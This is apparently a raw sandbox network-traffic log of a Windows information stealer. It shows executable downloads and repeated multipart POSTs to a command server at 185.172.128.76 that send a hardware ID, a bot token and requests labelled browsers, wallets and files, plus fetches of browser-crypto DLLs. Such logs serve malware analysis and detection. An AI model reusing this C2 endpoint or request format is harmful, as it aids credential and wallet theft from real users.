Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 23:32:02 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 23:32:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 32 37 45 45 43 34 32 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"BA827EEC42D32089257003------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"default10------KFIIJJJDGCBAAKFIIECG--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="message"browsers------HJKJKKKJJJKJKFHJJJJE--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="message"plugins------AKKEGHJDHDAFHIDHCFHD--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.172.128.76Content-Length: 8359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFBHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wallets------HIJEGDBGDBFIJKECBAKF--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="message"files------EGIDBFBFHJDGCAKEGHJE--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHCFBAKFBGDGDHJKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
